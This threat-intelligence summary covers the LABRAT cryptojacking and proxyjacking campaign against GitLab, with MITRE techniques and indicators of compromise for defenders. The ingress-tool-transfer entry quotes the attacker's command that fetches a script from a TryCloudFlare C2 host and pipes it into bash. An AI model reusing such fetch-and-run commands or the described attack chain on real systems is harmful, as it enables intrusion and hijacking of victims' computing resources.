LABRAT: Stealthy Cryptojacking and Proxyjacking Campaign Targeting GitLab

Sysdig Threat Research Team uncovered LABRAT, a stealthy, financially driven operation combining cryptomining and proxyjacking with multi-layer defense evasion targeting GitLab. The campaign uses undetected cross‑platform binaries, a TryCloudFlare‑based C2, a GSocket backdoor, and persistent techniques to stay hidden and monetize compromised hosts. #LABRAT #GitLab

Keypoints

The LABRAT operation emphasizes stealth and defense evasion through compiled Go/.NET binaries rather than typical script-based malware.
Initial access is gained by exploiting GitLab vulnerability CVE-2021-22205 to obtain remote code execution in a container.
The attacker uses TryCloudFlare subdomains to obfuscate C2 hosting and employs a private GitLab repository to host malicious binaries.
persistence and lateral movement are achieved via a file dropper, creation of a new service, and cron-based scheduled tasks, plus SSH key harvesting for movement.
LABRAT includes a backdoor (GSocket) with TLS-based C2 and the ability to use TOR, enabling stealthy communications.
cryptomining and proxyjacking are the primary monetization goals, with hard-coded mining pools and proxyware components.

MITRE Techniques

[T1190] Exploit Public-Facing Application – “The attacker gained initial access to a container by exploiting the known GitLab vulnerability, CVE-2021-22205.” – “The attacker gained initial access to a container by exploiting the known GitLab vulnerability, CVE-2021-22205.”
[T1105] Ingress Tool Transfer – “The attacker executed the following command in order to download a malicious script from the C2 server.” – “curl -kL -u lucifer:369369 https://passage-television-gardening-venue[.]trycloudflare.com/v3 | bash”
[T1053.005] Cron Jobs – “Modify various cron files to maintain persistence.”
[T1543.003] Create or Modify System Process: Linux Service – “Create a new service with one of these binaries and if root, ran it on the fly.”
[T1021.004] SSH – “Gather SSH keys to connect to those machines and start the process again, doing lateral movement.”
[T1090] Proxy – “The attacker attempted to obfuscate their C2 location by creating subdomains on trycloudflare[.]com.”
[T1496] Resource Hijacking – “to generate income, the attacker deployed both cryptomining and Russian-affiliated proxyjacking scripts.”
[T1071.001] Web Protocols – “The library then negotiates a secure end-to-end TLS connection. The GSRN sees only the encrypted traffic.”
[T1014] Rootkit – “kernel-based rootkits to hide their presence.”
[T1027] Obfuscated/Compressed Files and Information – “The technique used to obfuscate the DLL is called Control Flow Flattening (CFF) …”
[T1068] Exploitation for Privilege Escalation – “The m binary attempted to use the pwnkit vulnerability (CVE-2021-4034) to gain root access.”
[T1552.001] Private Keys – “gather SSH keys to connect to those machines…” (credential access via private keys)

Indicators of Compromise

[IP] context – 192.227.165.88:6666, 172.245.226.47:5858, and 23.94.204.157:44445, 23.94.204.157:7773
[Domain] context – desertplanets.com:6666, separate-discussing-refrigerator-field[.]trycloudflare.com, passage-television-gardening-venue[.]trycloudflare.com, coffee-abandoned-predicted-skype[.]trycloudflare.com, karma-adopt-income-jeffrey[.]trycloudflare.com
[File hash] context – m:10512112e62cd1cffee4e167651897970d7fef2c004fd784addcbcd23376ea22, v4:846ef36e262ce34203ca82ec84b95ae7bd316d162ee184845fda7b957e22b640, bs.zip:00df3dc4fe3a1c12acf3180d097ca88e0219331ae5cb6989fa4c3262597a2aba
[File hash] context – f_ab.tar.gz:96db518610ef5c4b08d454a0f931db619fa09d193ac05b10d5600d4652af6ee3, f_aa.tar.gz:519ca08cc6b08b027441cd95dcb7ee5be6f9328a24687ab770a65e9246e8d4e9, f_aa:06ebe58e033b9228124a0575fddd6d2fde03afceef9ae030c92cb6640e3baebf
[File name] context – api, booster, db, d.sh, deploy.sh, m, initd, netcoreapp-latest.tar, kms, puga, xorg